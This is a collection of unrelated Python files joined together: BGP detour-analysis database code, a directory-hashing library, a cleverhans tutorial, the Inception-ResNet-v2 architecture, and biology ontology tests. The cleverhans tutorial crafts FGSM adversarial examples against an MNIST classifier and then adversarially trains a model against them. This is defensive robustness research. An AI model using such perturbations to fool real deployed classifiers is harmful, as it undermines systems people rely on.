elif rline[6] == 'def':
self.num_def_detours+=1
iter=0
for pObj in self.peers:
if pObj.peerIP == rline[2]:
#print(pObj.peerIP, rline[2])
if rline[6] == 'poss':
self.peers[iter].peer_num_poss_detours+=1
elif rline[6] == 'def':
self.peers[iter].peer_num_def_detours+=1
break
iter+=1
if rline[4] not in seenASPaths:
if self.get_ASPath(db,rline[4]) is None:
finalent=[]
finalent.append(rline[0])
finalent.append(rline[4])
seenASPaths.append(rline[4])
finalent.append(str(rline[5]))
finalent.append(rline[6])
finalent.append(rline[7])
#finalent.append("\'"+str(rline[8])+"\'")
finalent.append(str(rline[8]))
finalent.append(rline[9])
finalent.append(str(rline[10]))
finalent.append(rline[11])
finalent.append(str(rline[12]))
finalent.append(str(rline[13]))
finalent.append(str(rline[14]))
toPushUniqueAbnormalPaths.append(finalent)
if rline[6] == 'def':
fentry=[]
fentry.append(rline[0])
fentry.append(rline[1])
fentry.append(rline[2])
fentry.append(rline[3])
fentry.append(rline[4])
toPushAbnormalRibEntries.append(fentry)
f.close()
#Update ProcessedRibs table
self.populateProcessedRibData('OK')
processedRibsID=self.push_ProcessedRibs(db,self.ProcessedRibData)
#Update ProcessedPeers table
self.populateProcessedPeerData(processedRibsID)
self.push_ProcessedPeers(db,self.ProcessedPeerData)
#Update ProcessedPeers table
self.populateProcessedPeerInfo()
self.push_PeerInfo(db,self.ProcessedPeerInfo)
self.push_UniqueAbnormalPaths(db,toPushUniqueAbnormalPaths)
self.push_AbnormalRibEntries(db,toPushAbnormalRibEntries)
self.logger.info("Pushed "+self.resultfilename+" to DB.")
self.resetparams() #resultfile must be closed before this call
finally:
self.lock.release()
db.commit()
return toPushAbnormalRibEntries
def loadTracestoDB(self,db,normalizeabnormalRibEntries):
for entry in normalizeabnormalRibEntries:
try:
id=entry[0]
ribTime=entry[1]
peer=entry[2]
prefix=entry[3]
net=entry[4]
randomHost=entry[5]
asPath=entry[6]
outfileName=entry[7]
#Read the warts file
lines = subprocess.check_output(["sc_warts2json", outfileName],universal_newlines=True)
data=[]
data.append(id)
data.append(ribTime)
data.append(peer)
data.append(prefix)
data.append(net)
data.append(randomHost)
data.append(asPath)
data.append(lines)
with closing( db.cursor() ) as cur:
try:
cur.execute("insert into Traceroutes(id,rib_time,peer,prefix,net,host_ip,as_path,json_trace) values (%s,%s,%s,%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to UniqueAbnormalPaths Failed')
os.remove(outfileName)
except:
traceback.print_exc()
self.logger.error('Problem in inserting data to Traceroutes table.')
db.commit()
|
|
# -*- coding: utf-8 -*-
# Source: https://github.com/tsileo/dirtools (copied here because pypi package is not updated)
import logging
import os
import hashlib
from contextlib import closing # for Python2.6 compatibility
import tarfile
import tempfile
from datetime import datetime
import json
from globster import Globster
log = logging.getLogger("dirtools")
# TODO abs=True args for .files(), .subdirs() ?
def load_patterns(exclude_file=".exclude"):
""" Load patterns to exclude file from `exclude_file',
and return a list of pattern.
:type exclude_file: str
:param exclude_file: File containing exclude patterns
:rtype: list
:return: List a patterns
"""
return filter(None, open(exclude_file).read().split("\n"))
def _filehash(filepath, blocksize=4096):
""" Return the hash object for the file `filepath', processing the file
by chunk of `blocksize'.
:type filepath: str
:param filepath: Path to file
:type blocksize: int
:param blocksize: Size of the chunk when processing the file
"""
sha = hashlib.sha256()
with open(filepath, 'rb') as fp:
while 1:
data = fp.read(blocksize)
if data:
sha.update(data)
else:
break
return sha
def filehash(filepath, blocksize=4096):
""" Return the hash hexdigest() for the file `filepath', processing the file
by chunk of `blocksize'.
:type filepath: str
:param filepath: Path to file
:type blocksize: int
:param blocksize: Size of the chunk when processing the file
"""
sha = _filehash(filepath, blocksize)
return sha.hexdigest()
class File(object):
def __init__(self, path):
self.file = os.path.basename(path)
self.path = os.path.abspath(path)
def _hash(self):
""" Return the hash object. """
return _filehash(self.path)
def hash(self):
""" Return the hash hexdigest. """
return filehash(self.path)
def compress_to(self, archive_path=None):
""" Compress the directory with gzip using tarlib.
:type archive_path: str
:param archive_path: Path to the archive, if None, a tempfile is created
"""
if archive_path is None:
archive = tempfile.NamedTemporaryFile(delete=False)
tar_args = ()
tar_kwargs = {'fileobj': archive}
_return = archive.name
else:
tar_args = (archive_path)
tar_kwargs = {}
_return = archive_path
tar_kwargs.update({'mode': 'w:gz'})
with closing(tarfile.open(*tar_args, **tar_kwargs)) as tar:
tar.add(self.path, arcname=self.file)
return _return
class Dir(object):
""" Wrapper for dirtools arround a path.
Try to load a .exclude file, ready to compute hashdir,
:type directory: str
:param directory: Root directory for initialization
:type exclude_file: str
:param exclude_file: File containing exclusion pattern,
.exclude by default, you can also load .gitignore files.
:type excludes: list
:param excludes: List of additionals patterns for exclusion,
by default: ['.git/', '.hg/', '.svn/']
"""
def __init__(self, directory=".", exclude_file=".exclude",
excludes=['.git/', '.hg/', '.svn/']):
if not os.path.isdir(directory):
raise TypeError("Directory must be a directory.")
self.directory = os.path.basename(directory)
self.path = os.path.abspath(directory)
self.parent = os.path.dirname(self.path)
self.exclude_file = os.path.join(self.path, exclude_file)
self.patterns = excludes
if os.path.isfile(self.exclude_file):
self.patterns.extend(load_patterns(self.exclude_file))
self.globster = Globster(self.patterns)
def hash(self, index_func=os.path.getmtime):
""" Hash for the entire directory (except excluded files) recursively.
Use mtime instead of sha256 by default for a faster hash.
>>> dir.hash(index_func=dirtools.filehash)
"""
# TODO alternative to filehash => mtime as a faster alternative
shadir = hashlib.sha256()
for f in self.files():
try:
shadir.update(str(index_func(os.path.join(self.path, f))))
except (IOError, OSError):
pass
return shadir.hexdigest()
def iterfiles(self, pattern=None, abspath=False):
""" Generator for all the files not excluded recursively.
Return relative path.
:type pattern: str
:param pattern: Unix style (glob like/gitignore like) pattern
"""
if pattern is not None:
globster = Globster([pattern])
for root, dirs, files in self.walk():
for f in files:
if pattern is None or (pattern is not None and globster.match(f)):
if abspath:
yield os.path.join(root, f)
else:
yield self.relpath(os.path.join(root, f))
def files(self, pattern=None, sort_key=lambda k: k, sort_reverse=False, abspath=False):
""" Return a sorted list containing relative path of all files (recursively).
:type pattern: str
:param pattern: Unix style (glob like/gitignore like) pattern
:param sort_key: key argument for sorted
:param sort_reverse: reverse argument for sorted
:rtype: list
:return: List of all relative files paths.
"""
return sorted(self.iterfiles(pattern, abspath=abspath), key=sort_key, reverse=sort_reverse)
def get(self, pattern, sort_key=lambda k: k, sort_reverse=False, abspath=False):
res = self.files(pattern, sort_key=sort_key, sort_reverse=sort_reverse, abspath=abspath)
if res:
return res[0]
def itersubdirs(self, pattern=None, abspath=False):
""" Generator for all subdirs (except excluded).
:type pattern: str
:param pattern: Unix style (glob like/gitignore like) pattern
"""
if pattern is not None:
globster = Globster([pattern])
for root, dirs, files in self.walk():
for d in dirs:
if pattern is None or (pattern is not None and globster.match(d)):
if abspath:
yield os.path.join(root, d)
else:
yield self.relpath(os.path.join(root, d))
def subdirs(self, pattern=None, sort_key=lambda k: k, sort_reverse=False, abspath=False):
""" Return a sorted list containing relative path of all subdirs (recursively).
:type pattern: str
:param pattern: Unix style (glob like/gitignore like) pattern
:param sort_key: key argument for sorted
:param sort_reverse: reverse argument for sorted
:rtype: list
:return: List of all relative files paths.
"""
return sorted(self.itersubdirs(pattern, abspath=abspath), key=sort_key, reverse=sort_reverse)
def size(self):
""" Return directory size in bytes.
:rtype: int
:return: Total directory size in bytes.
"""
dir_size = 0
for f in self.iterfiles(abspath=True):
dir_size += os.path.getsize(f)
return dir_size
def is_excluded(self, path):
""" Return True if `path' should be excluded
given patterns in the `exclude_file'. """
match = self.globster.match(self.relpath(path))
if match:
log.debug("{0} matched {1} for exclusion".format(path, match))
return True
return False
def walk(self):
""" Walk the directory like os.path
(yields a 3-tuple (dirpath, dirnames, filenames)
except it exclude all files/directories on the fly. """
for root, dirs, files in os.walk(self.path, topdown=True):
# TODO relative walk, recursive call if root excluder found???
# root_excluder = get_root_excluder(root)
ndirs = []
# First we exclude directories
for d in list(dirs):
if self.is_excluded(os.path.join(root, d)):
dirs.remove(d)
elif not os.path.islink(os.path.join(root, d)):
ndirs.append(d)
nfiles = []
for fpath in (os.path.join(root, f) for f in files):
if not self.is_excluded(fpath) and not os.path.islink(fpath):
nfiles.append(os.path.relpath(fpath, root))
yield root, ndirs, nfiles
def find_projects(self, file_identifier=".project"):
""" Search all directory recursively for subdirs
with `file_identifier' in it.
:type file_identifier: str
:param file_identifier: File identier, .project by default.
:rtype: list
:return: The list of subdirs with a `file_identifier' in it.
"""
projects = []
for d in self.subdirs():
project_file = os.path.join(self.directory, d, file_identifier)
if os.path.isfile(project_file):
projects.append(d)
return projects
def relpath(self, path):
""" Return a relative filepath to path from Dir path. """
return os.path.relpath(path, start=self.path)
def compress_to(self, archive_path=None):
""" Compress the directory with gzip using tarlib.
:type archive_path: str
:param archive_path: Path to the archive, if None, a tempfile is created
"""
if archive_path is None:
archive = tempfile.NamedTemporaryFile(delete=False)
tar_args = []
tar_kwargs = {'fileobj': archive}
_return = archive.name
else:
tar_args = [archive_path]
tar_kwargs = {}
_return = archive_path
tar_kwargs.update({'mode': 'w:gz'})
with closing(tarfile.open(*tar_args, **tar_kwargs)) as tar:
tar.add(self.path, arcname='', exclude=self.is_excluded)
return _return
class DirState(object):
""" Hold a directory state / snapshot meta-data for later comparison. """
def __init__(self, _dir=None, state=None, index_cmp=os.path.getmtime):
self._dir = _dir
self.index_cmp = index_cmp
self.state = state or self.compute_state()
def compute_state(self):
""" Generate the index. """
data = {}
data['directory'] = self._dir.path
data['files'] = list(self._dir.files())
data['subdirs'] = list(self._dir.subdirs())
data['index'] = self.index()
return data
def index(self):
index = {}
for f in self._dir.iterfiles():
try:
index[f] = self.index_cmp(os.path.join(self._dir.path, f))
except Exception as exc:
print(f, exc)
return index
def __sub__(self, other):
""" Compute diff with operator overloading.
>>> path = DirState(Dir('/path'))
>>> path_copy = DirState(Dir('/path_copy'))
>>> diff = path_copy - path
>>> # Equals to
>>> diff = compute_diff(path_copy.state, path.state)
"""
if self.index_cmp != other.index_cmp:
raise Exception('Both DirState instance must have the same index_cmp.')
return compute_diff(self.state, other.state)
def to_json(self, base_path='.', dt=None, fmt=None):
if fmt is None:
fmt = '{0}@{1}.json'
if dt is None:
dt = datetime.utcnow()
path = fmt.format(self._dir.path.strip('/').split('/')[-1],
dt.isoformat())
path = os.path.join(base_path, path)
with open(path, 'wb') as f:
f.write(json.dumps(self.state))
return path
@classmethod
def from_json(cls, path):
with open(path, 'rb') as f:
return cls(state=json.loads(f.read()))
def compute_diff(dir_base, dir_cmp):
""" Compare `dir_base' and `dir_cmp' and returns a list with
the following keys:
- deleted files `deleted'
- created files `created'
- updated files `updated'
- deleted directories `deleted_dirs'
"""
data = {}
data['deleted'] = list(set(dir_cmp['files']) - set(dir_base['files']))
data['created'] = list(set(dir_base['files']) - set(dir_cmp['files']))
data['updated'] = []
data['deleted_dirs'] = list(set(dir_cmp['subdirs']) - set(dir_base['subdirs']))
for f in set(dir_cmp['files']).intersection(set(dir_base['files'])):
if dir_base['index'][f] != dir_cmp['index'][f]:
data['updated'].append(f)
return data
|
|
"""
This tutorial shows how to use cleverhans.picklable_model
to create models that can be saved for evaluation later.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import flags
from cleverhans.attacks import FastGradientMethod
from cleverhans.dataset import MNIST
from cleverhans.loss import CrossEntropy
from cleverhans.serial import save
from cleverhans.utils_tf import model_eval, silence
from cleverhans.train import train
from cleverhans.utils import AccuracyReport, set_log_level
from cleverhans_tutorials.tutorial_models import make_basic_picklable_cnn
silence()
FLAGS = flags.FLAGS
NB_EPOCHS = 6
BATCH_SIZE = 128
LEARNING_RATE = .001
NB_FILTERS = 64
CLEAN_TRAIN = True
BACKPROP_THROUGH_ATTACK = False
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=NB_EPOCHS, batch_size=BATCH_SIZE,
learning_rate=LEARNING_RATE,
clean_train=CLEAN_TRAIN,
testing=False,
backprop_through_attack=BACKPROP_THROUGH_ATTACK,
nb_filters=NB_FILTERS, num_threads=None,
label_smoothing=0.1):
"""
MNIST cleverhans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param clean_train: perform normal training on clean examples only
before performing adversarial training.
:param testing: if true, complete an AccuracyReport for unit tests
to verify that performance is adequate
:param backprop_through_attack: If True, backprop through adversarial
example construction process during
adversarial training.
:param label_smoothing: float, amount of label smoothing for cross entropy
:return: an AccuracyReport object
"""
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
# Set logging level to see debug information
set_log_level(logging.DEBUG)
# Create TF session
if num_threads:
config_args = dict(intra_op_parallelism_threads=1)
else:
config_args = {}
sess = tf.Session(config=tf.ConfigProto(**config_args))
# Get MNIST test data
mnist = MNIST(train_start=train_start, train_end=train_end,
test_start=test_start, test_end=test_end)
x_train, y_train = mnist.get_set('train')
x_test, y_test = mnist.get_set('test')
# Use Image Parameters
img_rows, img_cols, nchannels = x_train.shape[1:4]
nb_classes = y_train.shape[1]
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, img_rows, img_cols,
nchannels))
y = tf.placeholder(tf.float32, shape=(None, nb_classes))
# Train an MNIST model
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate
}
eval_params = {'batch_size': batch_size}
fgsm_params = {
'eps': 0.3,
'clip_min': 0.,
'clip_max': 1.
}
rng = np.random.RandomState([2017, 8, 30])
def do_eval(preds, x_set, y_set, report_key, is_adv=None):
acc = model_eval(sess, x, y, preds, x_set, y_set, args=eval_params)
setattr(report, report_key, acc)
if is_adv is None:
report_text = None
elif is_adv:
report_text = 'adversarial'
else:
report_text = 'legitimate'
if report_text:
print('Test accuracy on %s examples: %0.4f' % (report_text, acc))
if clean_train:
model = make_basic_picklable_cnn()
# Tag the model so that when it is saved to disk, future scripts will
# be able to tell what data it was trained on
model.dataset_factory = mnist.get_factory()
preds = model.get_logits(x)
assert len(model.get_params()) > 0
loss = CrossEntropy(model, smoothing=label_smoothing)
def evaluate():
do_eval(preds, x_test, y_test, 'clean_train_clean_eval', False)
train(sess, loss, x_train, y_train, evaluate=evaluate,
args=train_params, rng=rng, var_list=model.get_params())
with sess.as_default():
save("clean_model.joblib", model)
print("Now that the model has been saved, you can evaluate it in a"
" separate process using `evaluate_pickled_model.py`. "
"You should get exactly the same result for both clean and "
"adversarial accuracy as you get within this program.")
# Calculate training error
if testing:
do_eval(preds, x_train, y_train, 'train_clean_train_clean_eval')
# Initialize the Fast Gradient Sign Method (FGSM) attack object and
# graph
fgsm = FastGradientMethod(model, sess=sess)
adv_x = fgsm.generate(x, **fgsm_params)
preds_adv = model.get_logits(adv_x)
# Evaluate the accuracy of the MNIST model on adversarial examples
do_eval(preds_adv, x_test, y_test, 'clean_train_adv_eval', True)
# Calculate training error
if testing:
do_eval(preds_adv, x_train, y_train, 'train_clean_train_adv_eval')
print('Repeating the process, using adversarial training')
# Create a new model and train it to be robust to FastGradientMethod
model2 = make_basic_picklable_cnn()
# Tag the model so that when it is saved to disk, future scripts will
# be able to tell what data it was trained on
model2.dataset_factory = mnist.get_factory()
fgsm2 = FastGradientMethod(model2, sess=sess)
def attack(x):
return fgsm2.generate(x, **fgsm_params)
loss2 = CrossEntropy(model2, smoothing=label_smoothing, attack=attack)
preds2 = model2.get_logits(x)
adv_x2 = attack(x)
if not backprop_through_attack:
# For the fgsm attack used in this tutorial, the attack has zero
# gradient so enabling this flag does not change the gradient.
# For some other attacks, enabling this flag increases the cost of
# training, but gives the defender the ability to anticipate how
# the atacker will change their strategy in response to updates to
# the defender's parameters.
adv_x2 = tf.stop_gradient(adv_x2)
preds2_adv = model2.get_logits(adv_x2)
def evaluate2():
# Accuracy of adversarially trained model on legitimate test inputs
do_eval(preds2, x_test, y_test, 'adv_train_clean_eval', False)
# Accuracy of the adversarially trained model on adversarial examples
do_eval(preds2_adv, x_test, y_test, 'adv_train_adv_eval', True)
# Perform and evaluate adversarial training
train(sess, loss2, x_train, y_train, evaluate=evaluate2,
args=train_params, rng=rng, var_list=model2.get_params())
with sess.as_default():
save("adv_model.joblib", model2)
print("Now that the model has been saved, you can evaluate it in a "
"separate process using "
"`python evaluate_pickled_model.py adv_model.joblib`. "
"You should get exactly the same result for both clean and "
"adversarial accuracy as you get within this program."
" You can also move beyond the tutorials directory and run the "
" real `compute_accuracy.py` script (make sure cleverhans/scripts "
"is in your PATH) to see that this FGSM-trained "
"model is actually not very robust---it's just a model that trains "
" quickly so the tutorial does not take a long time")
# Calculate training errors
if testing:
do_eval(preds2, x_train, y_train, 'train_adv_train_clean_eval')
do_eval(preds2_adv, x_train, y_train, 'train_adv_train_adv_eval')
return report
def main(argv=None):
from cleverhans_tutorials import check_installation
check_installation(__file__)
mnist_tutorial(nb_epochs=FLAGS.nb_epochs, batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
clean_train=FLAGS.clean_train,
backprop_through_attack=FLAGS.backprop_through_attack,
nb_filters=FLAGS.nb_filters)
if __name__ == '__main__':
flags.DEFINE_integer('nb_filters', NB_FILTERS, 'Model size multiplier')
flags.DEFINE_integer('nb_epochs', NB_EPOCHS,
'Number of epochs to train model')
flags.DEFINE_integer('batch_size', BATCH_SIZE, 'Size of training batches')
flags.DEFINE_float('learning_rate', LEARNING_RATE,
'Learning rate for training')
flags.DEFINE_bool('clean_train', CLEAN_TRAIN, 'Train on clean examples')
flags.DEFINE_bool('backprop_through_attack', BACKPROP_THROUGH_ATTACK,
('If True, backprop through adversarial example '
'construction process during adversarial training'))
tf.app.run()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains the definition of the Inception Resnet V2 architecture.
As described in http://arxiv.org/abs/1602.07261.
Inception-v4, Inception-ResNet and the Impact of Residual Connections
on Learning
Christian Szegedy, Sergey Ioffe, Vincent Vanhoucke, Alex Alemi
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
# Inception-Renset-A
def block35(net, scale=1.0, activation_fn=tf.nn.relu, scope=None, reuse=None):
"""Builds the 35x35 resnet block."""
with tf.variable_scope(scope, 'Block35', [net], reuse=reuse):
with tf.variable_scope('Branch_0'):
tower_conv = slim.conv2d(net, 32, 1, scope='Conv2d_1x1')
with tf.variable_scope('Branch_1'):
tower_conv1_0 = slim.conv2d(net, 32, 1, scope='Conv2d_0a_1x1')
tower_conv1_1 = slim.conv2d(tower_conv1_0, 32, 3, scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
tower_conv2_0 = slim.conv2d(net, 32, 1, scope='Conv2d_0a_1x1')
tower_conv2_1 = slim.conv2d(tower_conv2_0, 48, 3, scope='Conv2d_0b_3x3')
tower_conv2_2 = slim.conv2d(tower_conv2_1, 64, 3, scope='Conv2d_0c_3x3')
mixed = tf.concat(axis=3, values=[tower_conv, tower_conv1_1, tower_conv2_2])
up = slim.conv2d(mixed, net.get_shape()[3], 1, normalizer_fn=None,
activation_fn=None, scope='Conv2d_1x1')
net += scale * up
if activation_fn:
net = activation_fn(net)
return net
# Inception-Renset-B
def block17(net, scale=1.0, activation_fn=tf.nn.relu, scope=None, reuse=None):
"""Builds the 17x17 resnet block."""
with tf.variable_scope(scope, 'Block17', [net], reuse=reuse):
with tf.variable_scope('Branch_0'):
tower_conv = slim.conv2d(net, 192, 1, scope='Conv2d_1x1')
with tf.variable_scope('Branch_1'):
tower_conv1_0 = slim.conv2d(net, 128, 1, scope='Conv2d_0a_1x1')
tower_conv1_1 = slim.conv2d(tower_conv1_0, 160, [1, 7],
scope='Conv2d_0b_1x7')
tower_conv1_2 = slim.conv2d(tower_conv1_1, 192, [7, 1],
scope='Conv2d_0c_7x1')
mixed = tf.concat(axis=3, values=[tower_conv, tower_conv1_2])
up = slim.conv2d(mixed, net.get_shape()[3], 1, normalizer_fn=None,
activation_fn=None, scope='Conv2d_1x1')
net += scale * up
if activation_fn:
net = activation_fn(net)
return net
# Inception-Resnet-C
def block8(net, scale=1.0, activation_fn=tf.nn.relu, scope=None, reuse=None):
"""Builds the 8x8 resnet block."""
with tf.variable_scope(scope, 'Block8', [net], reuse=reuse):
with tf.variable_scope('Branch_0'):
tower_conv = slim.conv2d(net, 192, 1, scope='Conv2d_1x1')
with tf.variable_scope('Branch_1'):
tower_conv1_0 = slim.conv2d(net, 192, 1, scope='Conv2d_0a_1x1')
tower_conv1_1 = slim.conv2d(tower_conv1_0, 224, [1, 3],
scope='Conv2d_0b_1x3')
tower_conv1_2 = slim.conv2d(tower_conv1_1, 256, [3, 1],
scope='Conv2d_0c_3x1')
mixed = tf.concat(axis=3, values=[tower_conv, tower_conv1_2])
up = slim.conv2d(mixed, net.get_shape()[3], 1, normalizer_fn=None,
activation_fn=None, scope='Conv2d_1x1')
net += scale * up
if activation_fn:
net = activation_fn(net)
return net
def inference(images, keep_probability, phase_train=True, weight_decay=0.0, reuse=None):
batch_norm_params = {
# Decay for the moving averages.
'decay': 0.995,
# epsilon to prevent 0s in variance.
'epsilon': 0.001,
# force in-place updates of mean and variance estimates
'updates_collections': None,
# Moving averages ends up in the trainable variables collection
'variables_collections': [ tf.GraphKeys.TRAINABLE_VARIABLES ],
}
with slim.arg_scope([slim.conv2d],
weights_initializer=tf.truncated_normal_initializer(stddev=0.1),
weights_regularizer=slim.l2_regularizer(weight_decay),
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params):
return inception_resnet_v2(images, is_training=phase_train,
dropout_keep_prob=keep_probability, reuse=reuse)
def inception_resnet_v2(inputs, is_training=True,
dropout_keep_prob=0.8,
reuse=None,
scope='InceptionResnetV2'):
"""Creates the Inception Resnet V2 model.
Args:
inputs: a 4-D tensor of size [batch_size, height, width, 3].
num_classes: number of predicted classes.
is_training: whether is training or not.
dropout_keep_prob: float, the fraction to keep before final layer.
reuse: whether or not the network and its variables should be reused. To be
able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
logits: the logits outputs of the model.
end_points: the set of end_points from the inception model.
"""
end_points = {}
with tf.variable_scope(scope, 'InceptionResnetV2', [inputs], reuse=reuse):
with slim.arg_scope([slim.batch_norm, slim.dropout],
is_training=is_training):
with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d],
stride=1, padding='SAME'):
# 149 x 149 x 32
net = slim.conv2d(inputs, 32, 3, stride=2, padding='VALID',
scope='Conv2d_1a_3x3')
end_points['Conv2d_1a_3x3'] = net
# 147 x 147 x 32
net = slim.conv2d(net, 32, 3, padding='VALID',
scope='Conv2d_2a_3x3')
end_points['Conv2d_2a_3x3'] = net
# 147 x 147 x 64
net = slim.conv2d(net, 64, 3, scope='Conv2d_2b_3x3')
end_points['Conv2d_2b_3x3'] = net
# 73 x 73 x 64
net = slim.max_pool2d(net, 3, stride=2, padding='VALID',
scope='MaxPool_3a_3x3')
end_points['MaxPool_3a_3x3'] = net
# 73 x 73 x 80
net = slim.conv2d(net, 80, 1, padding='VALID',
scope='Conv2d_3b_1x1')
end_points['Conv2d_3b_1x1'] = net
# 71 x 71 x 192
net = slim.conv2d(net, 192, 3, padding='VALID',
scope='Conv2d_4a_3x3')
end_points['Conv2d_4a_3x3'] = net
# 35 x 35 x 192
net = slim.max_pool2d(net, 3, stride=2, padding='VALID',
scope='MaxPool_5a_3x3')
end_points['MaxPool_5a_3x3'] = net
# 35 x 35 x 320
with tf.variable_scope('Mixed_5b'):
with tf.variable_scope('Branch_0'):
tower_conv = slim.conv2d(net, 96, 1, scope='Conv2d_1x1')
with tf.variable_scope('Branch_1'):
tower_conv1_0 = slim.conv2d(net, 48, 1, scope='Conv2d_0a_1x1')
tower_conv1_1 = slim.conv2d(tower_conv1_0, 64, 5,
scope='Conv2d_0b_5x5')
with tf.variable_scope('Branch_2'):
tower_conv2_0 = slim.conv2d(net, 64, 1, scope='Conv2d_0a_1x1')
tower_conv2_1 = slim.conv2d(tower_conv2_0, 96, 3,
scope='Conv2d_0b_3x3')
tower_conv2_2 = slim.conv2d(tower_conv2_1, 96, 3,
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
tower_pool = slim.avg_pool2d(net, 3, stride=1, padding='SAME',
scope='AvgPool_0a_3x3')
tower_pool_1 = slim.conv2d(tower_pool, 64, 1,
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[tower_conv, tower_conv1_1,
tower_conv2_2, tower_pool_1])
end_points['Mixed_5b'] = net
net = slim.repeat(net, 10, block35, scale=0.17)
# 17 x 17 x 1024
with tf.variable_scope('Mixed_6a'):
with tf.variable_scope('Branch_0'):
tower_conv = slim.conv2d(net, 384, 3, stride=2, padding='VALID',
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
tower_conv1_0 = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
tower_conv1_1 = slim.conv2d(tower_conv1_0, 256, 3,
scope='Conv2d_0b_3x3')
tower_conv1_2 = slim.conv2d(tower_conv1_1, 384, 3,
stride=2, padding='VALID',
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
tower_pool = slim.max_pool2d(net, 3, stride=2, padding='VALID',
scope='MaxPool_1a_3x3')
net = tf.concat(axis=3, values=[tower_conv, tower_conv1_2, tower_pool])
end_points['Mixed_6a'] = net
net = slim.repeat(net, 20, block17, scale=0.10)
with tf.variable_scope('Mixed_7a'):
with tf.variable_scope('Branch_0'):
tower_conv = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
tower_conv_1 = slim.conv2d(tower_conv, 384, 3, stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
tower_conv1 = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
tower_conv1_1 = slim.conv2d(tower_conv1, 288, 3, stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
tower_conv2 = slim.conv2d(net, 256, 1, scope='Conv2d_0a_1x1')
tower_conv2_1 = slim.conv2d(tower_conv2, 288, 3,
scope='Conv2d_0b_3x3')
tower_conv2_2 = slim.conv2d(tower_conv2_1, 320, 3, stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_3'):
tower_pool = slim.max_pool2d(net, 3, stride=2, padding='VALID',
scope='MaxPool_1a_3x3')
net = tf.concat(axis=3, values=[tower_conv_1, tower_conv1_1,
tower_conv2_2, tower_pool])
end_points['Mixed_7a'] = net
net = slim.repeat(net, 9, block8, scale=0.20)
net = block8(net, activation_fn=None)
net = slim.conv2d(net, 1536, 1, scope='Conv2d_7b_1x1')
end_points['Conv2d_7b_1x1'] = net
with tf.variable_scope('Logits'):
end_points['PrePool'] = net
#pylint: disable=no-member
net = slim.avg_pool2d(net, net.get_shape()[1:3], padding='VALID',
scope='AvgPool_1a_8x8')
net = slim.flatten(net)
net = slim.dropout(net, dropout_keep_prob, is_training=is_training,
scope='Dropout')
end_points['PreLogitsFlatten'] = net
return net, end_points
|
|
from indra.statements import Agent
from indra.ontology.bio import bio_ontology
from indra.databases import go_client, hgnc_client
from indra.ontology.standardize import \
standardize_agent_name, standardize_db_refs, standardize_name_db_refs
def test_isa_entity():
assert bio_ontology.isa('HGNC', '1097', 'FPLX', 'RAF')
def test_isa_entity2():
assert not bio_ontology.isa('HGNC', '1097', 'HGNC', '646')
def test_isa_entity3():
assert not bio_ontology.isa('FPLX', 'RAF', 'HGNC', '1097')
def test_partof_entity():
assert bio_ontology.partof('FPLX', 'HIF_alpha', 'FPLX', 'HIF')
def test_isa_or_partof_entity():
assert bio_ontology.isa_or_partof('HGNC', '9385', 'FPLX', 'AMPK')
def test_partof_entity_not():
assert not bio_ontology.partof('FPLX', 'HIF1', 'FPLX', 'HIF_alpha')
def test_isa_mod():
assert bio_ontology.isa('INDRA_MODS', 'phosphorylation',
'INDRA_MODS', 'modification')
def test_isa_mod_not():
assert not bio_ontology.isa('INDRA_MODS', 'phosphorylation',
'INDRA_MODS', 'ubiquitination')
def test_isa_activity():
assert bio_ontology.isa('INDRA_ACTIVITIES', 'kinase',
'INDRA_ACTIVITIES', 'activity')
def test_isa_activity_not():
assert not bio_ontology.isa('INDRA_ACTIVITIES', 'kinase',
'INDRA_ACTIVITIES', 'phosphatase')
def test_partof_comp():
assert bio_ontology.isa_or_partof(
'GO', go_client.get_go_id_from_label('cytoplasm'),
'GO', go_client.get_go_id_from_label('cellular_component'))
def test_partof_comp_not():
assert not bio_ontology.isa_or_partof(
'GO', go_client.get_go_id_from_label('cellular_component'),
'GO', go_client.get_go_id_from_label('cytoplasm'))
def test_get_children():
rafs = bio_ontology.get_children('FPLX', 'RAF')
assert isinstance(rafs, list), rafs
assert len(rafs) == 3, rafs
brafs = bio_ontology.get_children('HGNC', hgnc_client.get_hgnc_id('BRAF'))
assert isinstance(brafs, list), brafs
assert len(brafs) == 0
mapks = bio_ontology.get_children('FPLX', 'MAPK')
